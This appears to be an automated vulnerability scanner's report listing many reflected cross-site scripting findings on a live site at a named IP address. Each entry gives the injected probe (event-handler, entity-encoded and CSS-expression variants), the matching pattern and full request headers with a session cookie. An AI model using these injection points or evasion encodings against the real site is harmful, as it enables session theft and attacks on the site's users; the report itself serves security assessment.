Cross-site scripting vulnerability detected at target URL
URL http://202.201.39.48/index.php/article/c37.html
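Request method GET
Affected parameter
Detection criteria 1. Change the specified parameter to crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/article/c37.html?'%20onmouseover=dfbhmg(6464)%20
2. Set parameter '%20onmouseover=dfbhmg(6464)%20
3. Match in response headers and response body: onmouseover.*?dfbhmg(6464)
Request & response GET /index.php/article/c37.html?'%20onmouseover=dfbhmg(6464)%20 HTTP/1.1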
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/

URL http://202.201.39.48/index.php/article/c37.html
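Request method GET
Affected parameter var
Detection criteria 1. Change the specified parameter to crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/article/c37.html?var='%20onmouseover=%22dfbhmg(6999)%22%3e%20
2. Set parameter var'%20onmouseover=%22dfbhmg(6999)%22%3e%20
3. Match in response headers and response body: onmouseover.*?dfbhmg(6999)
Request & response GET /index.php/article/c37.html?var='%20onmouseover=%22dfbhmg(6999)%22%3e%20 HTTP/1.1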
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/

URL http://202.201.39.48/index.php/article/c37.html
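Request method GET
Affected parameter
Detection criteria 1. Change the specified parameter to crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/article/c37.html/'%20onmouseover=%22dfbhmg(6106)%22%3e%20
2. Set parameter '%20onmouseover=%22dfbhmg(6106)%22%3e%20
3. Match in response headers and response body: onmouseover.*?dfbhmg(6106)
Request & response GET /index.php/article/c37.html/'%20onmouseover=%22dfbhmg(6106)%22%3e%20 HTTP/1.1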
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/

URL http://202.201.39.48/index.php/article/c37.html
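Request method GET
Affected parameter
Detection criteria 1. Change the specified parameter to crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/article/c37.html;'%20onmouseover=%22dfbhmg(6594)%22%3e%20var=%20
2. Set parameter '%20onmouseover=%22dfbhmg(6594)%22%3e%20var=%20
3. Match in response headers and response body: onmouseover.*?dfbhmg(6594)
Request & response GET /index.php/article/c37.html;'%20onmouseover=%22dfbhmg(6594)%22%3e%20var=%20 HTTP/1.1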
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/

URL http://202.201.39.48/index.php/article/c37.html
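Request method GET
Affected parameter
Detection criteria 1. Change the specified parameter to crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/article/c37.html'%20onmouseover=%22dfbhmg(6770)%22%3e%20
2. Set parameter '%20onmouseover=%22dfbhmg(6770)%22%3e%20
3. Match in response headers and response body: onmouseover.*?dfbhmg(6770)
Request & response GET /index.php/article/c37.html'%20onmouseover=%22dfbhmg(6770)%22%3e%20 HTTP/1.1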
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/

URL http://202.201.39.48/index.php/article/c38.mhtml
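Request method GET
Affected parameter
Detection criteria 1. Change the specified parameter to crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/article/c38.mhtml?'%20onmouseover=dfbhmg(6735)%20var=%20
2. Set parameter '%20onmouseover=dfbhmg(6735)%20var=%20
3. Match in response headers and response body: onmouseover.*?dfbhmg(6735)
Request & response GET /index.php/article/c38.mhtml?'%20onmouseover=dfbhmg(6735)%20var=%20 HTTP/1.1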
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c38.html

URL http://202.201.39.48/index.php/article/c38.mhtml
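Request method GET
Affected parameter var
Detection criteria 1. Change the specified parameter to crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/article/c38.mhtml?var='%20style=dfbhmg:expre/**/ssion(dfbhmg(6028))%20var=%20
2. Set parameter var'%20style=dfbhmg:expre/**/ssion(dfbhmg(6028))%20var=%20
3. Match in response headers and response body: style.*?dfbhmg:expre/**/ssion(dfbhmg(6028))
Request & response GET /index.php/article/c38.mhtml?var='%20style=dfbhmg:expre/**/ssion(dfbhmg(6028))%20var=%20 HTTP/1.1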
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c38.html

URL http://202.201.39.48/index.php/search-index-atestu-1.mhtml
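Request method GET
Affected parameter value0
Detection criteria 1. Change the specified parameter to crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/search-index-atestu-"%20onmouseover=dfbhmg(6048)%20.mhtml
2. Set parameter value0"%20onmouseover=dfbhmg(6048)%20
3. Match in response headers and response body: onmouseover.*?dfbhmg(6048)
Request & response GET /index.php/search-index-atestu-"%20onmouseover=dfbhmg(6048)%20.mhtml HTTP/1.1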
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/search/?words=atestu

URL http://202.201.39.48/index.php/article/c36.html
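Request method GET
Affected parameter
Detection criteria 1. Change the specified parameter to crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/article/c36.html?'%20style=dfbhmg:expre/**/ssion(dfbhmg(6588))%20var=%20
2. Set parameter '%20style=dfbhmg:expre/**/ssion(dfbhmg(6588))%20var=%20
3. Match in response headers and response body: style.*?dfbhmg:expre/**/ssion(dfbhmg(6588))
Request & response GET /index.php/article/c36.html?'%20style=dfbhmg:expre/**/ssion(dfbhmg(6588))%20var=%20 HTTP/1.1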
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/

URL http://202.201.39.48/index.php/article/c36.html
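Request method GET
Affected parameter var
Detection criteria 1. Change the specified parameter to crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/article/c36.html?var='%20onmouseover=%22dfbhmg(6656)%22%3e%20
2. Set parameter var'%20onmouseover=%22dfbhmg(6656)%22%3e%20
3. Match in response headers and response body: onmouseover.*?dfbhmg(6656)
Request & response GET /index.php/article/c36.html?var='%20onmouseover=%22dfbhmg(6656)%22%3e%20 HTTP/1.1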
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/

URL http://202.201.39.48/index.php/article/c36.html
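Request method GET
Affected parameter
Detection criteria 1. Change the specified parameter to crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/article/c36.html/'%20onmouseover=dfbhmg(6759)%20var=%20
2. Set parameter '%20onmouseover=dfbhmg(6759)%20var=%20
3. Match in response headers and response body: onmouseover.*?dfbhmg(6759)
Request & response GET /index.php/article/c36.html/'%20onmouseover=dfbhmg(6759)%20var=%20 HTTP/1.1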
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/

URL http://202.201.39.48/index.php/article/c36.html
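Request method GET
Affected parameter
Detection criteria 1. Change the specified parameter to crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/article/c36.html;'%20onmouseover=%22dfbhmg(6989)%22%3e%20var=%20
2. Set parameter '%20onmouseover=%22dfbhmg(6989)%22%3e%20var=%20
3. Match in response headers and response body: onmouseover.*?dfbhmg(6989)
Request & response GET /index.php/article/c36.html;'%20onmouseover=%22dfbhmg(6989)%22%3e%20var=%20 HTTP/1.1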
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/

URL http://202.201.39.48/index.php/article/c36.html
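Request method GET
Affected parameter
Detection criteria 1. Change the specified parameter to crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/article/c36.html'%20onmouseover=%22dfbhmg(6800)%22%3e%20
2. Set parameter '%20onmouseover=%22dfbhmg(6800)%22%3e%20
3. Match in response headers and response body: onmouseover.*?dfbhmg(6800)
Request & response GET /index.php/article/c36.html'%20onmouseover=%22dfbhmg(6800)%22%3e%20 HTTP/1.1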
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/

URL http://202.201.39.48/index.php/page/15.html
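Request method GET
Affected parameter value0
Detection criteria 1. Change the specified parameter to crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/page/"%20onmouseover=%22dfbhmg(6624)%22%3e%20.html
2. Set parameter value0"%20onmouseover=%22dfbhmg(6624)%22%3e%20
3. Match in response headers and response body: onmouseover.*?dfbhmg(6624)
Request & response GET /index.php/page/"%20onmouseover=%22dfbhmg(6624)%22%3e%20.html HTTP/1.1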
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/

URL http://202.201.39.48/index.php/article/c19.html
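Request method GET
Affected parameter
Detection criteria 1. Change the specified parameter to crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/article/c19.html?'%20onmouseover=%22dfbhmg(6533)%22%3e%20
2. Set parameter '%20onmouseover=%22dfbhmg(6533)%22%3e%20
3. Match in response headers and response body: onmouseover.*?dfbhmg(6533)
Request & response GET /index.php/article/c19.html?'%20onmouseover=%22dfbhmg(6533)%22%3e%20 HTTP/1.1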
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/

URL http://202.201.39.48/index.php/article/c19.html
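Request method GET
Affected parameter var
Detection criteria 1. Change the specified parameter to crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/article/c19.html?var='%20onmouseover=%22dfbhmg(6625)%22%3e%20
2. Set parameter var'%20onmouseover=%22dfbhmg(6625)%22%3e%20
3. Match in response headers and response body: onmouseover.*?dfbhmg(6625)
Request & response GET /index.php/article/c19.html?var='%20onmouseover=%22dfbhmg(6625)%22%3e%20 HTTP/1.1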
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/

URL http://202.201.39.48/index.php/article/c19.html
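Request method GET
Affected parameter
Detection criteria 1. Change the specified parameter to crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/article/c19.html/'%20onmouseover=dfbhmg(6898)%20var=%20
2. Set parameter '%20onmouseover=dfbhmg(6898)%20var=%20
3. Match in response headers and response body: onmouseover.*?dfbhmg(6898)
Request & response GET /index.php/article/c19.html/'%20onmouseover=dfbhmg(6898)%20var=%20 HTTP/1.1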
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/

URL http://202.201.39.48/index.php/article/c19.html
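Request method GET
Affected parameter
Detection criteria 1. Change the specified parameter to crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/article/c19.html;'%20onmouseover=dfbhmg(6319)%20
2. Set parameter '%20onmouseover=dfbhmg(6319)%20
3. Match in response headers and response body: onmouseover.*?dfbhmg(6319)
Request & response GET /index.php/article/c19.html;'%20onmouseover=dfbhmg(6319)%20 HTTP/1.1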
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/

URL http://202.201.39.48/index.php/article/c19.html
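Request method GET
Affected parameter
Detection criteria 1. Change the specified parameter to crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/article/c19.html'%20style=dfbhmg:expre/**/ssion(dfbhmg(6244))%20var=%20
2. Set parameter '%20style=dfbhmg:expre/**/ssion(dfbhmg(6244))%20var=%20
3. Match in response headers and response body: style.*?dfbhmg:expre/**/ssion(dfbhmg(6244))
Request & response GET /index.php/article/c19.html'%20style=dfbhmg:expre/**/ssion(dfbhmg(6244))%20var=%20 HTTP/1.1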
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/

URL http://202.201.39.48/index.php/article/19.html
Request method GET
Affected parameter value0
Detection criteria 1. Change the specified parameter to crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/article/19'%20onblur=%26%23x64;%26%23x66;%26%23x62;%26%23x68;%26%23x6d;%26%23x67;%26%23x28;%26%23x36;%26%23x30;%26%23x31;%26%23x33;%26%23x29;%20.html
2. Set parameter value0'%20onblur=%26%23x64;%26%23x66;%26%23x62;%26%23x68;%26%23x6d;%26%23x67;%26%23x28;%26%23x36;%26%23x30;%26%23x31;%26%23x33;%26%23x29;%20
3. Match in response headers and response body: onblur.*?dfbhmg(6013)
Request & response GET /index.php/article/19'%20onblur=%26%23x64;%26%23x66;%26%23x62;%26%23x68;%26%23x6d;%26%23x67;%26%23x28;%26%23x36;%26%23x30;%26%23x31;%26%23x33;%26%23x29;%20.html HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/

URL http://202.201.39.48/index.php/article/c17.html
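Request method GET
Affected parameter
Detection criteria 1. Change the specified parameter to crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/article/c17.html?'%20onmouseover=dfbhmg(6770)%20
2. Set parameter '%20onmouseover=dfbhmg(6770)%20
3. Match in response headers and response body: onmouseover.*?dfbhmg(6770)
Request & response GET /index.php/article/c17.html?'%20onmouseover=dfbhmg(6770)%20 HTTP/1.1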
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/

URL http://202.201.39.48/index.php/article/c17.html
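Request method GET
Affected parameter var
Detection criteria 1. Change the specified parameter to crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/article/c17.html?var='%20onmouseover=%22dfbhmg(6728)%22%3e%20var=%20
2. Set parameter var'%20onmouseover=%22dfbhmg(6728)%22%3e%20var=%20
3. Match in response headers and response body: onmouseover.*?dfbhmg(6728)
Request & response GET /index.php/article/c17.html?var='%20onmouseover=%22dfbhmg(6728)%22%3e%20var=%20 HTTP/1.1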
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/

URL http://202.201.39.48/index.php/article/c17.html
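Request method GET
Affected parameter
Detection criteria 1. Change the specified parameter to crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/article/c17.html/'%20onmouseover=dfbhmg(6373)%20
2. Set parameter '%20onmouseover=dfbhmg(6373)%20
3. Match in response headers and response body: onmouseover.*?dfbhmg(6373)
Request & response GET /index.php/article/c17.html/'%20onmouseover=dfbhmg(6373)%20 HTTP/1.1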
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/

URL http://202.201.39.48/index.php/article/c17.html
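Request method GET
Affected parameter
Detection criteria 1. Change the specified parameter to crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/article/c17.html;'%20onmouseover=%22dfbhmg(6204)%22%3e%20
2. Set parameter '%20onmouseover=%22dfbhmg(6204)%22%3e%20
3. Match in response headers and response body: onmouseover.*?dfbhmg(6204)
Request & response GET /index.php/article/c17.html;'%20onmouseover=%22dfbhmg(6204)%22%3e%20 HTTP/1.1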
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/

URL http://202.201.39.48/index.php/article/c17.html
Request method GET
Affected parameter
Detection criteria 1. Change the specified parameter to crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/article/c17.html'%20onblur=%26%23x64;%26%23x66;%26%23x62;%26%23x68;%26%23x6d;%26%23x67;%26%23x28;%26%23x36;%26%23x32;%26%23x37;%26%23x31;%26%23x29;%20
2. Set parameter '%20onblur=%26%23x64;%26%23x66;%26%23x62;%26%23x68;%26%23x6d;%26%23x67;%26%23x28;%26%23x36;%26%23x32;%26%23x37;%26%23x31;%26%23x29;%20
3. Match in response headers and response body: onblur.*?dfbhmg(6271)
Request & response GET /index.php/article/c17.html'%20onblur=%26%23x64;%26%23x66;%26%23x62;%26%23x68;%26%23x6d;%26%23x67;%26%23x28;%26%23x36;%26%23x32;%26%23x37;%26%23x31;%26%23x29;%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/

URL http://202.201.39.48/index.php/page/17.html
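Request method GET
Affected parameter value0
Detection criteria 1. Change the specified parameter to crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/page/"%20onmouseover=dfbhmg(6150)%20.html
2. Set parameter value0"%20onmouseover=dfbhmg(6150)%20
3. Match in response headers and response body: onmouseover.*?dfbhmg(6150)
Request & response GET /index.php/page/"%20onmouseover=dfbhmg(6150)%20.html HTTP/1.1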
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/

URL http://202.201.39.48/index.php/article/36.html
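Request method GET
Affected parameter value0
Detection criteria 1. Change the specified parameter to crafted XSS special characters;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/index.php/article/36'%20onmouseover=%22dfbhmg(6165)%22%3e%20var=%20.html
2. Set parameter value0'%20onmouseover=%22dfbhmg(6165)%22%3e%20var=%20
3. Match in response headers and response body: onmouseover.*?dfbhmg(6165)
Request & response GET /index.php/article/36'%20onmouseover=%22dfbhmg(6165)%22%3e%20var=%20.html HTTP/1.1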
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/

URL http://202.201.39.48/index.php/article/c37/p2.html
